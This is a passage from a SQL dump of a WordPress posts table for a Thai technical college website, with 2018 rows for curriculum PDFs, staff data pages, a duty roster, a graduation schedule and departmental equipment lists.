(1351, 3, '2018-02-26 14:01:21', '2018-02-26 07:01:21', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2FDetail-of-durable-articles-1-object.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประชาพิจารณ์รายละเอียดร่างคุณลักษณะเฉพาะครุภัณฑ์ จำนวน 1 รายการ ประจำปีงบประมาณ 2561', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%9e%e0%b8%b4%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%93%e0%b9%8c%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%a5%e0%b8%b0%e0%b9%80%e0%b8%ad%e0%b8%b5%e0%b8%a2%e0%b8%94-2', '', '', '2018-02-26 14:11:16', '2018-02-26 07:11:16', '', 0, 'http://www.technicrayong.ac.th/?p=1351', 461, 'post', '', 0),
(1352, 3, '2018-02-26 14:01:21', '2018-02-26 07:01:21', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2FDetail-of-durable-articles-1-object.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประชาพิจารณ์รายละเอียดร่างคุณลักษณะเฉพาะครุภัณฑ์ จำนวน 1 รายการ ประจำปีงบประมาณ 2561', '', 'inherit', 'closed', 'closed', '', '1351-revision-v1', '', '', '2018-02-26 14:01:21', '2018-02-26 07:01:21', '', 1351, 'http://www.technicrayong.ac.th/1351-revision-v1/', 0, 'revision', '', 0),
(1353, 3, '2018-02-26 14:11:04', '2018-02-26 07:11:04', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2FDetail-of-durable-articles-1-object.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประชาพิจารณ์รายละเอียดร่างคุณลักษณะเฉพาะครุภัณฑ์ จำนวน 1 รายการ ประจำปีงบประมาณ 2561', '', 'inherit', 'closed', 'closed', '', '1351-autosave-v1', '', '', '2018-02-26 14:11:04', '2018-02-26 07:11:04', '', 1351, 'http://www.technicrayong.ac.th/1351-autosave-v1/', 0, 'revision', '', 0),
(1354, 3, '2018-02-26 15:14:17', '2018-02-26 08:14:17', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F06%2F%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B8%9A%E0%B8%B8%E0%B8%84%E0%B8%84%E0%B8%A5%E0%B8%B2%E0%B8%81%E0%B8%A3-2561.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">ข้อมูลบุคลากร ปี 2562</span></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/06/ข้อมูลบุคคลากร-2561.pdf\">ข้อมูลบุคลากร ปี 2561</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/06/ข้อมูลบุคคลากร2560.pdf\">ข้อมูลบุคลากร ปี 2560</a></h3>', 'ข้อมูลบุคลากร', '', 'publish', 'closed', 'closed', '', '%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%9a%e0%b8%b8%e0%b8%84%e0%b8%a5%e0%b8%b2%e0%b8%81%e0%b8%a360', '', '', '2019-01-30 09:58:05', '2019-01-30 02:58:05', '', 0, 'http://www.technicrayong.ac.th/?page_id=1354', 0, 'page', '', 0),
(1356, 3, '2018-02-26 15:14:17', '2018-02-26 08:14:17', '<img class=\"aligncenter wp-image-1355 size-full\" src=\"/wp-content/uploads/2018/02/26-2-2561-15-15-04.jpg\" alt=\"\" width=\"816\" height=\"734\" />', 'ข้อมูลบุคลากร', '', 'inherit', 'closed', 'closed', '', '1354-revision-v1', '', '', '2018-02-26 15:14:17', '2018-02-26 08:14:17', '', 1354, 'http://www.technicrayong.ac.th/1354-revision-v1/', 0, 'revision', '', 0),
(1360, 3, '2018-02-26 15:31:59', '2018-02-26 08:31:59', '<img class=\"aligncenter wp-image-1359 size-full\" src=\"/wp-content/uploads/2018/02/26-2-2561-15-31-35.jpg\" alt=\"\" width=\"2258\" height=\"1584\" />', 'ข้อมูลบุคลากร', '', 'inherit', 'closed', 'closed', '', '1354-revision-v1', '', '', '2018-02-26 15:31:59', '2018-02-26 08:31:59', '', 1354, 'http://www.technicrayong.ac.th/1354-revision-v1/', 0, 'revision', '', 0),
(1362, 3, '2018-02-26 15:36:11', '2018-02-26 08:36:11', '<img class=\"aligncenter size-medium wp-image-1361\" src=\"/wp-content/uploads/2018/02/26-2-2561-15-31-35-300x248.jpg\" alt=\"\" width=\"300\" height=\"248\" />', 'ข้อมูลบุคลากร', '', 'inherit', 'closed', 'closed', '', '1354-revision-v1', '', '', '2018-02-26 15:36:11', '2018-02-26 08:36:11', '', 1354, 'http://www.technicrayong.ac.th/1354-revision-v1/', 0, 'revision', '', 0),
(1363, 3, '2018-02-26 15:36:54', '2018-02-26 08:36:54', '<img class=\"aligncenter wp-image-1361 size-full\" src=\"/wp-content/uploads/2018/02/26-2-2561-15-31-35.jpg\" alt=\"\" width=\"1887\" height=\"1561\" />', 'ข้อมูลบุคลากร', '', 'inherit', 'closed', 'closed', '', '1354-revision-v1', '', '', '2018-02-26 15:36:54', '2018-02-26 08:36:54', '', 1354, 'http://www.technicrayong.ac.th/1354-revision-v1/', 0, 'revision', '', 0),
(1365, 3, '2018-02-26 15:38:00', '2018-02-26 08:38:00', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B8%9A%E0%B8%B8%E0%B8%84%E0%B8%84%E0%B8%A5%E0%B8%B2%E0%B8%81%E0%B8%A32560.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ข้อมูลบุคลากร', '', 'inherit', 'closed', 'closed', '', '1354-revision-v1', '', '', '2018-02-26 15:38:00', '2018-02-26 08:38:00', '', 1354, 'http://www.technicrayong.ac.th/1354-revision-v1/', 0, 'revision', '', 0),
(1368, 3, '2018-02-26 16:25:03', '2018-02-26 09:25:03', '', 'ข้อมูลบุคคลากร2560', '', 'inherit', 'closed', 'closed', '', '%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%9a%e0%b8%b8%e0%b8%84%e0%b8%84%e0%b8%a5%e0%b8%b2%e0%b8%81%e0%b8%a32560', '', '', '2018-02-26 16:25:03', '2018-02-26 09:25:03', '', 1354, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/ข้อมูลบุคคลากร2560.pdf', 0, 'attachment', 'application/pdf', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1370, 3, '2018-02-27 09:21:41', '2018-02-27 02:21:41', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B8%81%E0%B8%B3%E0%B8%AB%E0%B8%99%E0%B8%94%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%9E%E0%B8%B4%E0%B8%98%E0%B8%B5%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B9%83%E0%B8%9A%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8%E0%B8%99%E0%B8%B5%E0%B8%A2%E0%B8%9A%E0%B8%B1%E0%B8%95%E0%B8%A3-2560.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'กำหนดการพิธีรับใบประกาศนียบัตร สำหรับผู้จบการศึกษา ระดับ ปวช.3 และ ปวส.2 ประจำปีการศึกษา 2560', '', 'publish', 'closed', 'open', '', '%e0%b8%81%e0%b8%b3%e0%b8%ab%e0%b8%99%e0%b8%94%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9e%e0%b8%b4%e0%b8%98%e0%b8%b5%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b9%83%e0%b8%9a%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2', '', '', '2018-02-28 09:42:15', '2018-02-28 02:42:15', '', 0, 'http://www.technicrayong.ac.th/?p=1370', 460, 'post', '', 0),
(1372, 3, '2018-02-27 09:21:41', '2018-02-27 02:21:41', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B8%81%E0%B8%B3%E0%B8%AB%E0%B8%99%E0%B8%94%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%9E%E0%B8%B4%E0%B8%98%E0%B8%B5%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B9%83%E0%B8%9A%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8%E0%B8%99%E0%B8%B5%E0%B8%A2%E0%B8%9A%E0%B8%B1%E0%B8%95%E0%B8%A3.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'กำหนดการพิธีรับใบประกาศนียบัตร สำหรับผู้จบการศึกษา ระดับ ปวช.3 และ ปวส.2 ประจำปีการศึกษา 2560', '', 'inherit', 'closed', 'closed', '', '1370-revision-v1', '', '', '2018-02-27 09:21:41', '2018-02-27 02:21:41', '', 1370, 'http://www.technicrayong.ac.th/1370-revision-v1/', 0, 'revision', '', 0),
(1374, 3, '2018-02-27 10:03:44', '2018-02-27 03:03:44', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%80%E0%B8%A7%E0%B8%A3-%E0%B9%80%E0%B8%94%E0%B8%B7%E0%B8%AD%E0%B8%99-%E0%B8%A1%E0%B8%B5%E0%B8%99%E0%B8%B2%E0%B8%84%E0%B8%A1-2561-1.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ตารางเวร เดือนมีนาคม 2561', '', 'publish', 'closed', 'open', '', '%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b9%80%e0%b8%a7%e0%b8%a3-%e0%b9%80%e0%b8%94%e0%b8%b7%e0%b8%ad%e0%b8%99%e0%b8%a1%e0%b8%b5%e0%b8%99%e0%b8%b2%e0%b8%84%e0%b8%a1-2561', '', '', '2018-03-06 16:18:15', '2018-03-06 09:18:15', '', 0, 'http://www.technicrayong.ac.th/?p=1374', 459, 'post', '', 0),
(1376, 3, '2018-02-27 10:03:44', '2018-02-27 03:03:44', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%80%E0%B8%A7%E0%B8%A3-%E0%B9%80%E0%B8%94%E0%B8%B7%E0%B8%AD%E0%B8%99-%E0%B8%A1%E0%B8%B5%E0%B8%99%E0%B8%B2%E0%B8%84%E0%B8%A1-2561.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ตารางเวร เดือนมีนาคม 2561', '', 'inherit', 'closed', 'closed', '', '1374-revision-v1', '', '', '2018-02-27 10:03:44', '2018-02-27 03:03:44', '', 1374, 'http://www.technicrayong.ac.th/1374-revision-v1/', 0, 'revision', '', 0),
(1379, 3, '2018-02-27 10:09:20', '2018-02-27 03:09:20', '<img class=\"aligncenter wp-image-1378 size-full\" src=\"/wp-content/uploads/2018/02/27-2-2561-10-09-08.jpg\" alt=\"\" width=\"980\" height=\"785\" />', 'ข้อมูลบุคลากร', '', 'inherit', 'closed', 'closed', '', '1354-revision-v1', '', '', '2018-02-27 10:09:20', '2018-02-27 03:09:20', '', 1354, 'http://www.technicrayong.ac.th/1354-revision-v1/', 0, 'revision', '', 0),
(1380, 3, '2018-02-27 10:10:40', '2018-02-27 03:10:40', '<img class=\"aligncenter wp-image-1378\" src=\"/wp-content/uploads/2018/02/27-2-2561-10-09-08.jpg\" alt=\"\" width=\"1500\" height=\"1202\" />', 'ข้อมูลบุคลากร', '', 'inherit', 'closed', 'closed', '', '1354-revision-v1', '', '', '2018-02-27 10:10:40', '2018-02-27 03:10:40', '', 1354, 'http://www.technicrayong.ac.th/1354-revision-v1/', 0, 'revision', '', 0),
(1381, 3, '2018-02-27 10:14:05', '2018-02-27 03:14:05', '<img class=\"aligncenter wp-image-1378\" src=\"/wp-content/uploads/2018/02/27-2-2561-10-09-08.jpg\" alt=\"\" width=\"1200\" height=\"961\" />', 'ข้อมูลบุคลากร', '', 'inherit', 'closed', 'closed', '', '1354-revision-v1', '', '', '2018-02-27 10:14:05', '2018-02-27 03:14:05', '', 1354, 'http://www.technicrayong.ac.th/1354-revision-v1/', 0, 'revision', '', 0),
(1384, 3, '2018-02-27 13:55:03', '2018-02-27 06:55:03', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B9%80%E0%B8%A1%E0%B8%B4%E0%B8%99%E0%B8%9C%E0%B8%A5%E0%B8%81%E0%B8%B4%E0%B8%88%E0%B8%81%E0%B8%A3%E0%B8%A3%E0%B8%A1%E0%B8%99%E0%B8%B1%E0%B8%81%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99.-2-2560.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ การประเมินผลกิจกรรมนักเรียน นักศึกษา ภาคเรียนที่ 2 ปีการศึกษา 2560', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99%e0%b8%9c%e0%b8%a5%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81', '', '', '2018-02-27 13:55:03', '2018-02-27 06:55:03', '', 0, 'http://www.technicrayong.ac.th/?p=1384', 458, 'post', '', 0),
(1385, 3, '2018-02-27 13:54:42', '2018-02-27 06:54:42', '', 'การประเมินผลกิจกรรมนักเรียน. 2-2560', '', 'inherit', 'closed', 'closed', '', '%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99%e0%b8%9c%e0%b8%a5%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b8%99%e0%b8%b1%e0%b8%81', '', '', '2018-02-27 13:54:42', '2018-02-27 06:54:42', '', 1384, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/การประเมินผลกิจกรรมนักเรียน.-2-2560.pdf', 0, 'attachment', 'application/pdf', 0),
(1386, 3, '2018-02-27 13:55:03', '2018-02-27 06:55:03', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B9%80%E0%B8%A1%E0%B8%B4%E0%B8%99%E0%B8%9C%E0%B8%A5%E0%B8%81%E0%B8%B4%E0%B8%88%E0%B8%81%E0%B8%A3%E0%B8%A3%E0%B8%A1%E0%B8%99%E0%B8%B1%E0%B8%81%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99.-2-2560.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ การประเมินผลกิจกรรมนักเรียน นักศึกษา ภาคเรียนที่ 2 ปีการศึกษา 2560', '', 'inherit', 'closed', 'closed', '', '1384-revision-v1', '', '', '2018-02-27 13:55:03', '2018-02-27 06:55:03', '', 1384, 'http://www.technicrayong.ac.th/1384-revision-v1/', 0, 'revision', '', 0),
(1387, 3, '2018-02-27 14:58:41', '2018-02-27 07:58:41', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B8%AB%E0%B8%A5%E0%B8%B1%E0%B8%81%E0%B8%AA%E0%B8%B9%E0%B8%95%E0%B8%A3-%E0%B8%9B%E0%B8%A7%E0%B8%8A..pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B8%AB%E0%B8%A5%E0%B8%B1%E0%B8%81%E0%B8%AA%E0%B8%B9%E0%B8%95%E0%B8%A3-%E0%B8%9B%E0%B8%A7%E0%B8%AA.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B8%AB%E0%B8%A5%E0%B8%B1%E0%B8%81%E0%B8%AA%E0%B8%B9%E0%B8%95%E0%B8%A3-%E0%B8%9B.%E0%B8%95%E0%B8%A3%E0%B8%B5.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ข้อมูลหลักสูตรการเรียน การสอน', '', 'publish', 'closed', 'closed', '', '%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%ab%e0%b8%a5%e0%b8%b1%e0%b8%81%e0%b8%aa%e0%b8%b9%e0%b8%95%e0%b8%a3%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%9961', '', '', '2018-02-27 15:06:32', '2018-02-27 08:06:32', '', 0, 'http://www.technicrayong.ac.th/?page_id=1387', 0, 'page', '', 0),
(1388, 3, '2018-02-27 14:44:46', '2018-02-27 07:44:46', '', 'หลักสูตร ปวช.', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ab%e0%b8%a5%e0%b8%b1%e0%b8%81%e0%b8%aa%e0%b8%b9%e0%b8%95%e0%b8%a3-%e0%b8%9b%e0%b8%a7%e0%b8%8a', '', '', '2018-02-27 14:44:46', '2018-02-27 07:44:46', '', 1387, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/หลักสูตร-ปวช..pdf', 0, 'attachment', 'application/pdf', 0),
(1390, 3, '2018-02-27 14:58:31', '2018-02-27 07:58:31', '', 'หลักสูตร ป.ตรี', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ab%e0%b8%a5%e0%b8%b1%e0%b8%81%e0%b8%aa%e0%b8%b9%e0%b8%95%e0%b8%a3-%e0%b8%9b-%e0%b8%95%e0%b8%a3%e0%b8%b5', '', '', '2018-02-27 14:58:31', '2018-02-27 07:58:31', '', 1387, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/หลักสูตร-ป.ตรี.pdf', 0, 'attachment', 'application/pdf', 0),
(1391, 3, '2018-02-27 14:58:41', '2018-02-27 07:58:41', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B8%AB%E0%B8%A5%E0%B8%B1%E0%B8%81%E0%B8%AA%E0%B8%B9%E0%B8%95%E0%B8%A3-%E0%B8%9B%E0%B8%A7%E0%B8%8A..pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B8%AB%E0%B8%A5%E0%B8%B1%E0%B8%81%E0%B8%AA%E0%B8%B9%E0%B8%95%E0%B8%A3-%E0%B8%9B%E0%B8%A7%E0%B8%AA..pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B8%AB%E0%B8%A5%E0%B8%B1%E0%B8%81%E0%B8%AA%E0%B8%B9%E0%B8%95%E0%B8%A3-%E0%B8%9B.%E0%B8%95%E0%B8%A3%E0%B8%B5.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ข้อมูลหลักสูตรการเรียน การสอน', '', 'inherit', 'closed', 'closed', '', '1387-revision-v1', '', '', '2018-02-27 14:58:41', '2018-02-27 07:58:41', '', 1387, 'http://www.technicrayong.ac.th/1387-revision-v1/', 0, 'revision', '', 0),
(1392, 3, '2018-02-27 15:05:55', '2018-02-27 08:05:55', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B8%AB%E0%B8%A5%E0%B8%B1%E0%B8%81%E0%B8%AA%E0%B8%B9%E0%B8%95%E0%B8%A3-%E0%B8%9B%E0%B8%A7%E0%B8%8A..pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B8%AB%E0%B8%A5%E0%B8%B1%E0%B8%81%E0%B8%AA%E0%B8%B9%E0%B8%95%E0%B8%A3-%E0%B8%9B%E0%B8%A7%E0%B8%AA.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B8%AB%E0%B8%A5%E0%B8%B1%E0%B8%81%E0%B8%AA%E0%B8%B9%E0%B8%95%E0%B8%A3-%E0%B8%9B.%E0%B8%95%E0%B8%A3%E0%B8%B5.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ข้อมูลหลักสูตรการเรียน การสอน', '', 'inherit', 'closed', 'closed', '', '1387-autosave-v1', '', '', '2018-02-27 15:05:55', '2018-02-27 08:05:55', '', 1387, 'http://www.technicrayong.ac.th/1387-autosave-v1/', 0, 'revision', '', 0),
(1394, 3, '2018-02-27 15:05:18', '2018-02-27 08:05:18', '', 'หลักสูตร ปวส', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ab%e0%b8%a5%e0%b8%b1%e0%b8%81%e0%b8%aa%e0%b8%b9%e0%b8%95%e0%b8%a3-%e0%b8%9b%e0%b8%a7%e0%b8%aa', '', '', '2018-02-27 15:05:18', '2018-02-27 08:05:18', '', 1387, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/หลักสูตร-ปวส.pdf', 0, 'attachment', 'application/pdf', 0),
(1395, 3, '2018-02-27 15:05:46', '2018-02-27 08:05:46', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B8%AB%E0%B8%A5%E0%B8%B1%E0%B8%81%E0%B8%AA%E0%B8%B9%E0%B8%95%E0%B8%A3-%E0%B8%9B%E0%B8%A7%E0%B8%8A..pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B8%AB%E0%B8%A5%E0%B8%B1%E0%B8%81%E0%B8%AA%E0%B8%B9%E0%B8%95%E0%B8%A3-%E0%B8%9B%E0%B8%A7%E0%B8%AA.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B8%AB%E0%B8%A5%E0%B8%B1%E0%B8%81%E0%B8%AA%E0%B8%B9%E0%B8%95%E0%B8%A3-%E0%B8%9B.%E0%B8%95%E0%B8%A3%E0%B8%B5.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ข้อมูลหลักสูตรการเรียน การสอน', '', 'inherit', 'closed', 'closed', '', '1387-revision-v1', '', '', '2018-02-27 15:05:46', '2018-02-27 08:05:46', '', 1387, 'http://www.technicrayong.ac.th/1387-revision-v1/', 0, 'revision', '', 0),
(1396, 3, '2018-02-27 15:08:33', '2018-02-27 08:08:33', '', 'ข้อมูลบุคคลากร2560', '', 'inherit', 'closed', 'closed', '', '%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%9a%e0%b8%b8%e0%b8%84%e0%b8%84%e0%b8%a5%e0%b8%b2%e0%b8%81%e0%b8%a32560-2', '', '', '2018-02-27 15:08:33', '2018-02-27 08:08:33', '', 1354, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/ข้อมูลบุคคลากร2560-1.pdf', 0, 'attachment', 'application/pdf', 0),
(1397, 3, '2018-02-27 15:08:46', '2018-02-27 08:08:46', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B8%9A%E0%B8%B8%E0%B8%84%E0%B8%84%E0%B8%A5%E0%B8%B2%E0%B8%81%E0%B8%A32560-1.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ข้อมูลบุคลากร', '', 'inherit', 'closed', 'closed', '', '1354-revision-v1', '', '', '2018-02-27 15:08:46', '2018-02-27 08:08:46', '', 1354, 'http://www.technicrayong.ac.th/1354-revision-v1/', 0, 'revision', '', 0),
(1399, 3, '2018-02-27 15:45:48', '2018-02-27 08:45:48', '<h1 class=\"entry-title\"><span style=\"color: #0000ff;\">ข้อมูลครุภัณฑ์ ปีการศึกษา 2560</span></h1>\r\n<h2><span style=\"color: #0000ff;\">ประเภทวิชาอุตสาหกรรม</span></h2>\r\n<ul>\r\n <li>\r\n<h4><a href=\"/wp-content/uploads/2018/02/แผนกวิชาช่างยนต์.pdf\">แผนกวิชาช่างยนต์</a></h4>\r\n</li>\r\n <li>\r\n<h4><a href=\"/wp-content/uploads/2018/02/แผนกวิชาช่างกล.pdf\">แผนกวิชาช่างกล</a></h4>\r\n</li>\r\n <li>\r\n<h4><a href=\"/wp-content/uploads/2018/02/แผนกวิชาไฟฟ้า.pdf\">แผนกวิชาไฟฟ้า</a></h4>\r\n</li>\r\n <li>\r\n<h4><a href=\"/wp-content/uploads/2018/02/แผนกวิชาอิเล็กทรอนิกส์.pdf\">แผนกวิชาอิเล็กทรอนิกส์</a></h4>\r\n</li>\r\n <li>\r\n<h4><a href=\"/wp-content/uploads/2018/02/แผนกวิชาก่อสร้าง.pdf\">แผนกวิชาก่อสร้าง</a></h4>\r\n</li>\r\n <li>\r\n<h4><a href=\"/wp-content/uploads/2018/02/แผนกวิชาเครื่องมือวัดและควบคุม.pdf\">แผนกวิชาเครื่องมือวัดและควบคุม</a></h4>\r\n</li>\r\n <li>\r\n<h4><a href=\"/wp-content/uploads/2018/02/แผนกวิชาปิโตรเคมี.pdf\">แผนกวิชาปิโตรเคมี</a></h4>\r\n</li>\r\n <li>\r\n<h4><a href=\"/wp-content/uploads/2018/02/แผนกวิชาเคมีอุตสาหกรรม.pdf\">แผนกวิชาเคมีอุตสาหกรรม</a></h4>\r\n</li>\r\n <li>\r\n<h4><a href=\"/wp-content/uploads/2018/02/แผนกวิชาเทคโนโลยียาง.pdf\">แผนกวิชาเทคโนโลยียาง</a></h4>\r\n</li>\r\n</ul>\r\n \r\n<h2><span style=\"color: #0000ff;\">ประเภทวิชาพาณิชยกรรม/บริหารธุรกิจ</span></h2>\r\n<ul>\r\n <li>\r\n<h4><a href=\"/wp-content/uploads/2018/02/แผนกวิชาการบัญชี.pdf\">แผนกวิชาการบัญชี</a></h4>\r\n</li>\r\n <li>\r\n<h4><a href=\"/wp-content/uploads/2018/02/แผนกวิชาการตลาด.pdf\">แผนกวิชาการตลาด</a></h4>\r\n</li>\r\n <li>\r\n<h4><a href=\"/wp-content/uploads/2018/02/แผนกวิชาการเลขานุการ.pdf\">แผนกวิชาการเลขานุการ</a></h4>\r\n</li>\r\n <li>\r\n<h4><a href=\"/wp-content/uploads/2018/02/แผนกวิชาคอมพิวเตอร์ธุรกิจ.pdf\">แผนกวิชาคอมพิวเตอร์ธุรกิจ</a></h4>\r\n</li>\r\n <li>\r\n<h4><a href=\"/wp-content/uploads/2018/02/แผนกวิชาโลจิสติกส์.pdf\">แผนกวิชาโลจิสติกส์</a></h4>\r\n</li>\r\n</ul>\r\n<h4></h4>\r\n<h2><span style=\"color: #0000ff;\">ประเภทวิชาคหกรรมศาสตร์</span></h2>\r\n<ul>\r\n <li>\r\n<h4><a href=\"/wp-content/uploads/2018/02/แผนกวิชาคหกรรมศาสตร์.pdf\">แผนกวิชาคหกรรมศาสตร์</a></h4>\r\n</li>\r\n <li>\r\n<h4><a href=\"/wp-content/uploads/2018/02/แผนกวิชาผ้าและเครื่องแต่งกาย.pdf\">แผนกวิชาผ้าและเครื่องแต่งกาย</a></h4>\r\n</li>\r\n <li>\r\n<h4><a href=\"/wp-content/uploads/2018/02/แผนกวิชาอาหารและโภชนาการ.pdf\">แผนกวิชาอาหารและโภชนาการ</a></h4>\r\n</li>\r\n</ul>\r\n \r\n<h2><span style=\"color: #0000ff;\">ประเภทวิชาอุตสาหกรรมท่องเที่ยว</span></h2>\r\n<ul>\r\n <li>\r\n<h4><a href=\"/wp-content/uploads/2018/02/แผนกวิชาการโรงแรม.pdf\">แผนกวิชาการโรงแรม</a></h4>\r\n</li>\r\n <li>\r\n<h4><a href=\"/wp-content/uploads/2018/02/แผนกวิชาการท่องเที่ยว.pdf\">แผนกวิชาการท่องเที่ยว</a></h4>\r\n</li>\r\n</ul>\r\n \r\n<h2><span style=\"color: 